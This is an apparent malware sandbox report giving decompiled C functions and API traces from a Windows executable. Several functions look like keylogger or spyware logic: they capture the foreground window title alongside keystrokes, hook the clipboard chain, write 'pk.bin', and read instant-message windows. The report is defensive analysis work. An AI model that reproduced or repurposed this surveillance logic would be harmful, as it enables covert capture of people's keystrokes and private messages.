      • Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B
    • #1779.MFC42(00000421,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B552
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #5953$#1779#3092#4710#5951InvalidateMessageRectSend
    • String ID:
    • API String ID: 3207811862-0
    • Opcode ID: 1a05e98cc2e7630ad0c5e935822a11d998d401f9258438ae5f81e07f30a2b9a7
    • Instruction ID: 4f40fa3593a54995fd56effb57fa448d05171b26be719667a4c3e4e36b72b4ff
    • Opcode Fuzzy Hash: 1a05e98cc2e7630ad0c5e935822a11d998d401f9258438ae5f81e07f30a2b9a7
    • Instruction Fuzzy Hash: 9521B6B1340710BFF5246767DCC2FBB769DEB85B08F00041EB681AB3D1CAE99D008669
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040E323(struct HFONT__* __ecx) {
    				void* _t29;
    				struct HDC__* _t32;
    				struct HDC__* _t33;
    				struct HFONT__* _t39;
    				intOrPtr _t41;
    				void* _t53;
    				intOrPtr _t55;
    				struct HDC__* _t56;
    				int _t58;
    				void* _t60;
    
    				E0043E4E0(0x44010c, _t60);
    				_t39 = __ecx;
    				_t53 = __ecx + 0x64;
    				_t58 = 0;
    				if(_t53 == 0 ||  *((intOrPtr*)(_t53 + 4)) == 0) {
    					E0040E42B(_t39);
    				}
    				if(_t53 != _t58 &&  *((intOrPtr*)(_t53 + 4)) != _t58) {
    					GetClientRect( *(_t39 + 0x20), _t60 - 0x2c);
    					L0043E000();
    					_t41 =  *((intOrPtr*)(_t60 + 8));
    					 *(_t60 - 4) = _t58;
    					if(_t41 != _t58) {
    						_t32 =  *(_t41 + 4);
    					} else {
    						_t32 = 0;
    					}
    					_t33 = CreateCompatibleDC(_t32);
    					_push(_t33);
    					L0043DFFA();
    					if(_t53 != _t58) {
    						_t55 =  *((intOrPtr*)(_t53 + 4));
    					} else {
    						_t55 = 0;
    					}
    					_push(_t55);
    					_push( *(_t60 - 0x18));
    					L0043DD84();
    					_t56 = _t33;
    					asm("sbb eax, eax");
    					BitBlt( *(_t41 + 4), _t58, _t58,  *((intOrPtr*)(_t60 - 0x24)) -  *(_t60 - 0x2c),  *((intOrPtr*)(_t60 - 0x20)) -  *((intOrPtr*)(_t60 - 0x28)),  ~(_t60 - 0x1c) &  *(_t60 - 0x18), _t58, _t58, 0xcc0020);
    					if(_t56 != _t58) {
    						_t58 =  *(_t56 + 4);
    					}
    					_push(_t58);
    					_push( *(_t60 - 0x18));
    					L0043DD84();
    					 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
    					L0043DFF4();
    				}
    				_t29 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
    				return _t29;
    			}
    (Disassembly address column only; the instruction listing did not survive extraction.)

    APIs
    • __EH_prolog.LIBCMT ref: 0040E328
    • GetClientRect.USER32 ref: 0040E362
    • #323.MFC42 ref: 0040E36B
    • CreateCompatibleDC.GDI32(?), ref: 0040E382
    • #1640.MFC42(00000000), ref: 0040E38C
    • #5785.MFC42(?,?,00000000), ref: 0040E3A0
    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040E3CC
    • #5785.MFC42(?,00000000), ref: 0040E3DD
    • #640.MFC42(?,00000000), ref: 0040E3E9
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #5785$#1640#323#640ClientCompatibleCreateH_prologRect
    • String ID:
    • API String ID: 3472376613-0
    • Opcode ID: c9ef6308fce99b532bd8f276a1ba569f71ff7cd1de4fdcc937aca1f74670c84c
    • Instruction ID: 441a49bf4daf49adddbb21451af20d37afbf68a81f50fa962d602fdadf0f354f
    • Opcode Fuzzy Hash: c9ef6308fce99b532bd8f276a1ba569f71ff7cd1de4fdcc937aca1f74670c84c
    • Instruction Fuzzy Hash: CB21D372900115EBCB21DFA6D8859EFBF75FF88750B10853AF915B3191C738A811CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00418F4D(signed int __eax, void* __ecx) {
    				signed int _t36;
    				signed int _t37;
    				signed int _t38;
    				signed int _t39;
    				signed int _t40;
    				intOrPtr _t42;
    				long _t43;
    				intOrPtr _t44;
    				void* _t61;
    
    				_t61 = __ecx;
    				_push(0x4e25);
    				L0043DFA6();
    				_push(0x8016);
    				_t36 = __eax & 0xffffff00 | __eax != 0x00000000;
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x124) = _t36;
    				L0043DFA6();
    				_push(0x8017);
    				_t37 = _t36 & 0xffffff00 | _t36 != 0x00000000;
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x129) = _t37;
    				L0043DFA6();
    				_push(0x8018);
    				_t38 = _t37 & 0xffffff00 | _t37 != 0x00000000;
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x12a) = _t38;
    				L0043DFA6();
    				_push(0x4e26);
    				_t39 = _t38 & 0xffffff00 | _t38 != 0x00000000;
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x130) = _t39;
    				L0043DFA6();
    				_push(0x801a);
    				_t40 = _t39 & 0xffffff00 | _t39 != 0x00000000;
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x12c) = _t40;
    				L0043DFA6();
    				_push(0x442);
    				 *((char*)( *((intOrPtr*)(__ecx + 0x64)) + 0x14c)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
    				_t42 =  *((intOrPtr*)(__ecx + 0x64));
    				 *((char*)(_t42 + 0x12b)) =  *((intOrPtr*)(_t42 + 0x12a));
    				L0043E066();
    				_t43 = SendMessageA( *(_t42 + 0x20), 0x402, 0, 0);
    				_push(0x8019);
    				 *(_t61 + 0x68) = _t43;
    				L0043DFA6();
    				if(_t43 != 0) {
    					 *(_t61 + 0x69) =  *(_t61 + 0x69) | 0x00000080;
    				}
    				_t44 =  *((intOrPtr*)(_t61 + 0x64));
    				 *((intOrPtr*)(_t44 + 0x35c)) =  *((intOrPtr*)(_t61 + 0x1c0));
    				return _t44;
    			}
    (Disassembly address column only; the instruction listing did not survive extraction.)

    APIs
    • #4055.MFC42(00004E25), ref: 00418F55
    • #4055.MFC42(00008016,00004E25), ref: 00418F6F
    • #4055.MFC42(00008017,00008016,00004E25), ref: 00418F89
    • #4055.MFC42(00008018,00008017,00008016,00004E25), ref: 00418FA3
    • #4055.MFC42(00004E26,00008018,00008017,00008016,00004E25), ref: 00418FBD
    • #4055.MFC42(0000801A,00004E26,00008018,00008017,00008016,00004E25), ref: 00418FD7
    • #3092.MFC42(00000442,0000801A,00004E26,00008018,00008017,00008016,00004E25), ref: 00419000
    • SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00419011
    • #4055.MFC42(00008019), ref: 00419021
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #4055$#3092MessageSend
    • String ID:
    • API String ID: 1389896077-0
    • Opcode ID: ed28e316254c2d3ca0a6740f5f1b6a1309e6e3d712d02a8bef45529c54cd86c4
    • Instruction ID: f15c5ed10ad8ced89f658e2c82dbc107253f361899bed9ba0a76bd963c1312df
    • Opcode Fuzzy Hash: ed28e316254c2d3ca0a6740f5f1b6a1309e6e3d712d02a8bef45529c54cd86c4
    • Instruction Fuzzy Hash: 7D21D131301B408FE215AB718A56EEA3B962F9CB14F0840AEF6C34F3D3DE54A911CB49
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0041C1B3(void* __ecx) {
    				int _t19;
    				void* _t38;
    
    				E0043E4E0(0x441678, _t38);
    				_push(__ecx);
    				_push(__ecx);
    				_push(1);
    				L0043E08A();
    				_t19 = strcmp( *(__ecx + 0xd4),  *(__ecx + 0xd0));
    				if(_t19 == 0) {
    					L0043E03C();
    				} else {
    					L0043DDD8();
    					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
    					_push(_t38 - 0x10);
    					L0043E19E();
    					_t19 =  *(E00429029(_t38 - 0x14, 0xe02d));
    					_push(0x10);
    					_push( *((intOrPtr*)(_t38 - 0x10)));
    					 *(_t38 - 4) = 1;
    					_push(_t19);
    					L0043E2EE();
    					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
    					L0043DD36();
    					 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
    				return _t19;
    			}
    (Disassembly address column only; the instruction listing did not survive extraction.)

    APIs
    • __EH_prolog.LIBCMT ref: 0041C1B8
    • #6334.MFC42(00000001), ref: 0041C1C4
    • strcmp.MSVCRT ref: 0041C1D5
    • #540.MFC42(00000001), ref: 0041C1E3
    • #3874.MFC42(?,00000001), ref: 0041C1F2
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #4224.MFC42(?,?,00000010,?,00000001), ref: 0041C215
    • #800.MFC42(?,?,00000010,?,00000001), ref: 0041C221
    • #800.MFC42(?,?,00000010,?,00000001), ref: 0041C22D
    • #4853.MFC42(00000001), ref: 0041C236
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#1168#3874#4224#4853#537#540#6334H_prologLoadStringstrcmp
    • String ID:
    • API String ID: 3304702502-0
    • Opcode ID: 013ef5ae874f7ed80cfed0f5c3de83375fbfc81e78bcd0a74264556d8ce7bbf8
    • Instruction ID: ab244a863b63b1987982e45dff40a4763015b14e65b9204dc8ab506e66162651
    • Opcode Fuzzy Hash: 013ef5ae874f7ed80cfed0f5c3de83375fbfc81e78bcd0a74264556d8ce7bbf8
    • Instruction Fuzzy Hash: AD01D271E12214ABDB18EBE6D942BEE77B8AF0C314F10145FF012A21D1DFB81E008769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00420076(intOrPtr __ecx, void* __edi, char _a8) {
    				void _v263;
    				signed char _v264;
    				void _v563;
    				char _v564;
    				void* __ebp;
    				int _t33;
    				void* _t41;
    				struct HWND__* _t48;
    				signed int _t50;
    				void* _t64;
    				intOrPtr _t70;
    
    				_t64 = __edi;
    				_t70 = __ecx;
    				_t48 = GetForegroundWindow();
    				_t33 =  *((intOrPtr*)(_t70 + 0x360)) - 1;
    				if(_a8 != 0x20) {
    					if(_a8 != 8) {
    						goto L7;
    					} else {
    						if(_t33 != 0xffffffff) {
    							_push(1);
    							_push(_t33);
    							L0043E468();
    							return _t33;
    						}
    					}
    				} else {
    					if(_t33 != 0xffffffff) {
    						if( *((char*)( *((intOrPtr*)(_t70 + 0x35c)) + _t33)) == 0xa) {
    							return _t33;
    						}
    						L7:
    						_v564 = _v564 & 0x00000000;
    						_push(_t64);
    						_t50 = 0x4a;
    						memset( &_v563, 0, _t50 << 2);
    						_v264 = _v264 & 0x00000000;
    						_push(0x40);
    						asm("stosw");
    						asm("stosb");
    						memset( &_v263, 0, 0 << 2);
    						asm("stosw");
    						asm("stosb");
    						_t33 = IsWindow(_t48);
    						if(_t33 != 0) {
    							GetWindowTextA(_t48,  &_v564, 0x12c);
    							_t41 = E00428947(_t48,  &_v264);
    							if( *(_t70 + 4) != 0) {
    								_t41 = E0042049A(_t70,  &_v564,  &_v264);
    								 *(_t70 + 4) =  *(_t70 + 4) & 0x00000000;
    							}
    							if(_t48 !=  *(_t70 + 0x354) &&  *(_t70 + 4) == 0) {
    								if(E0042064C(_t70) != 0) {
    									_push(0xffffffff);
    									_push(0);
    									L0043E456();
    								} else {
    									E004201B7(_t70);
    								}
    								_t41 = E0042049A(_t70,  &_v564,  &_v264);
    							}
    							_push(_a8);
    							_push( *((intOrPtr*)(_t70 + 0x360)));
    							L0043E462();
    							 *(_t70 + 0x354) = _t48;
    							return _t41;
    						}
    					}
    				}
    				return _t33;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$#5602#5857ForegroundText
    • String ID:
    • API String ID: 3029010372-3916222277
    • Opcode ID: d2c68b457d0b8a70c54e20f2bdb6b963fe8fc659ec8eae0106cb14bb8ef50280
    • Instruction ID: 36bacc79a8265e79c02aa739cb9462023919e80ff369541f1cfa65ba3b461a33
    • Opcode Fuzzy Hash: d2c68b457d0b8a70c54e20f2bdb6b963fe8fc659ec8eae0106cb14bb8ef50280
    • Instruction Fuzzy Hash: DD3135717007286BEB319730EC84BFB77E8AB14314F44459FE15A921C2CBBD5A898B19
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00421463(void* __ecx) {
    				void* __esi;
    				intOrPtr _t20;
    				void* _t24;
    				intOrPtr* _t34;
    				void* _t39;
    				void* _t41;
    				char** _t43;
    
    				E0043E4E0(0x442148, _t41);
    				_push(__ecx);
    				_t39 = __ecx;
    				E00422CB5(__ecx);
    				_t45 = __ecx;
    				if(__ecx != 0) {
    					_t20 =  *((intOrPtr*)(__ecx + 0x20));
    				} else {
    					_t20 = 0;
    				}
    				E00428327(_t20);
    				 *_t43 = "pk.bin";
    				_push(0x4558c8);
    				_push(_t41 - 0x10);
    				 *((char*)(_t39 + 0x17dd)) = 0;
    				L0043DE20();
    				 *(_t41 - 4) = 0;
    				E0040BC5C(_t39 + 0x16b8, _t45,  *((intOrPtr*)(_t41 - 0x10)));
    				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
    				L0043DD36();
    				_t46 =  *((intOrPtr*)(_t39 + 0x1d38));
    				if( *((intOrPtr*)(_t39 + 0x1d38)) != 0) {
    					ChangeClipboardChain( *(_t39 + 0x20),  *(_t39 + 0x2738));
    				}
    				_t24 = E00426D6B(_t46, 0);
    				_t47 =  *((intOrPtr*)(_t39 + 0x17dc));
    				if( *((intOrPtr*)(_t39 + 0x17dc)) != 0) {
    					_t24 = E0042817C(_t39, _t47, 0x4550cc,  *((intOrPtr*)(_t39 + 0x1a14)));
    				}
    				_t34 =  *((intOrPtr*)(_t39 + 0x60));
    				if(_t34 != 0) {
    					_t24 =  *((intOrPtr*)( *_t34 + 4))(1);
    				}
    				PostQuitMessage(0);
    				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
    				return _t24;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00421468
      • Part of subcall function 00422CB5: UnregisterHotKey.USER32(?,00000000,00421477), ref: 00422CC3
    • #924.MFC42(?,004558C8,?), ref: 004214A0
    • #800.MFC42(?,004558C8,?), ref: 004214BC
    • ChangeClipboardChain.USER32(?,?,?,004558C8,?), ref: 004214D2
    • PostQuitMessage.USER32(00000000), ref: 00421509
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800#924ChainChangeClipboardH_prologMessagePostQuitUnregister
    • String ID: H!D$pk.bin
    • API String ID: 619069355-2634250293
    • Opcode ID: 11c00064be92ec980dcf7e3db8baeb522104d2c1ea985a88800be1acb26c5d4a
    • Instruction ID: dd8ba89de973c5d8fed8d480af102b3a8150279c30f094b963e54c7b5841f83e
    • Opcode Fuzzy Hash: 11c00064be92ec980dcf7e3db8baeb522104d2c1ea985a88800be1acb26c5d4a
    • Instruction Fuzzy Hash: 3911C831605754AFC720FBB5E8819AEBBB4FF19304B40496FF05B972A1CB796844CB18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040925C(intOrPtr _a4, struct HWND__* _a8) {
    				struct HWND__* _v8;
    				struct tagRECT _v24;
    				void* __ebp;
    				struct HWND__* _t16;
    				struct HWND__* _t20;
    
    				_v8 = 0;
    				_t16 = FindWindowExA(_a8, FindWindowExA(_a8, 0, "Button", "To"), "Static", 0);
    				_v8 = _t16;
    				GetWindowRect(_t16,  &_v24);
    				while(_v24.left < 0x9d && _v24.left > 0xb4) {
    					_t20 = FindWindowExA(_a8, _v8, 0, "Static");
    					_v8 = _t20;
    					GetWindowRect(_t20,  &_v24);
    				}
    				_push(_v8);
    				_push(_a4);
    				E0040FEA7();
    				return _a4;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$Find$Rect
    • String ID: Button$Static
    • API String ID: 2266178948-2498952662
    • Opcode ID: 00aa0628e058f5a074b55f50cc41ebe79e433bb44d5a730d34a5a205c6c63b09
    • Instruction ID: 59b331853f046970e1b76411e1733e0e1d07526f63648da2b8d372fca853f5b0
    • Opcode Fuzzy Hash: 00aa0628e058f5a074b55f50cc41ebe79e433bb44d5a730d34a5a205c6c63b09
    • Instruction Fuzzy Hash: B101ADB6900208FADF01EFA4CD01EAEBB78EB85315F20806BF800B2192D6785F04DB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0042A727(void* _a4) {
    				long _v8;
    				char _v268;
    				void* _t21;
    
    				GetModuleFileNameA(0,  &_v268, 0x104);
    				 *(strrchr( &_v268, 0x5c)) = 0;
    				SetCurrentDirectoryA( &_v268);
    				_t21 = CreateFileA("install.log", 0x80000000, 1, 0, 3, 0, 0);
    				if(_t21 != 0xffffffff) {
    					if(ReadFile(_t21, _a4, 0x208,  &_v8, 0) != 0) {
    						_push(1);
    						_pop(0);
    					}
    					CloseHandle(_t21);
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042A741
    • strrchr.MSVCRT ref: 0042A750
    • SetCurrentDirectoryA.KERNEL32(?), ref: 0042A761
    • CreateFileA.KERNEL32(install.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0042A778
    • ReadFile.KERNEL32(00000000,?,00000208,?,00000000), ref: 0042A797
    • CloseHandle.KERNEL32(00000000), ref: 0042A7A5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: File$CloseCreateCurrentDirectoryHandleModuleNameReadstrrchr
    • String ID: install.log
    • API String ID: 3452216514-1352807950
    • Opcode ID: 3cc14501c575d4bd2e449099727cb6cc2ef7a23007153788673e354b9512efa3
    • Instruction ID: 0ec86d546ab394b3e87e8aac5c1dc51826991feeaacb956c9b02187b9ab53b65
    • Opcode Fuzzy Hash: 3cc14501c575d4bd2e449099727cb6cc2ef7a23007153788673e354b9512efa3
    • Instruction Fuzzy Hash: CE01A77A640218BFF7105BA0BC8DFD7776CEB55355F100172FB41E21C0DAB49E948A69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00410E77(intOrPtr* __ecx) {
    				signed int _t30;
    				void* _t36;
    
    				E0043E4E0(0x44052f, _t36);
    				_push(__ecx);
    				_push(__ecx);
    				 *(_t36 - 0x14) =  *(_t36 - 0x14) & 0x00000000;
    				L0043DDD8();
    				_t30 = 1;
    				 *(_t36 - 4) = _t30;
    				if( *((intOrPtr*)( *__ecx - 8)) != 0) {
    					_push( *((intOrPtr*)(__ecx + 4)));
    					_push( *__ecx);
    					_push("%s <%s>");
    					_push(_t36 - 0x10);
    					L0043E174();
    				} else {
    					_push(__ecx + 4);
    					L0043DFCA();
    				}
    				_push(_t36 - 0x10);
    				L0043DD3C();
    				 *(_t36 - 0x14) = _t30;
    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return  *((intOrPtr*)(_t36 + 8));
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2818#535#540#800#858H_prolog
    • String ID: %s <%s>
    • API String ID: 1004837876-227962274
    • Opcode ID: 730e7a70200d122ecfddc3babf176229b3d03cec0181017f1afe80301b8b8990
    • Instruction ID: 71484664902f626659bbcb50e86e222cf8a267f8aa492818e04212967d33a89d
    • Opcode Fuzzy Hash: 730e7a70200d122ecfddc3babf176229b3d03cec0181017f1afe80301b8b8990
    • Instruction Fuzzy Hash: D5019A72D00119EBDB11EB95C942BEEB3B4EF08308F10482FF411A7280D7B86A44CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00409AEA(void* __ebx) {
    				signed int _t14;
    				void* _t17;
    				signed int _t19;
    				void* _t26;
    
    				E0043E4E0(0x43f8f8, _t26);
    				if(strncmp( *(_t26 + 0xc), "IMClass", 7) != 0 || IsWindow( *(_t26 + 8)) == 0) {
    					_t14 = 0;
    				} else {
    					_push( *(_t26 + 8));
    					_push(_t26 + 8);
    					_t17 = E0040FEA7();
    					_t19 = 0;
    					_push("Instant Message");
    					 *(_t26 - 4) = 0;
    					L0043DFD6();
    					if(_t17 != 0xffffffff) {
    						_t19 = 1;
    					}
    					 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
    					L0043DD36();
    					_t14 = _t19;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
    				return _t14;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00409AEF
    • strncmp.MSVCRT(?,IMClass,00000007), ref: 00409AFE
    • IsWindow.USER32(?), ref: 00409B0E
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42(Instant Message), ref: 00409B34
    • #800.MFC42(Instant Message), ref: 00409B45
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800H_prologMessageSendWindow$#2764#535#537#823#825memsetstrncmp
    • String ID: IMClass$Instant Message
    • API String ID: 3887305776-4191539829
    • Opcode ID: 56567f191300ebdc2aa62c89ead3a7aec4aff7847f2036aa5403ab8f2e3b9c60
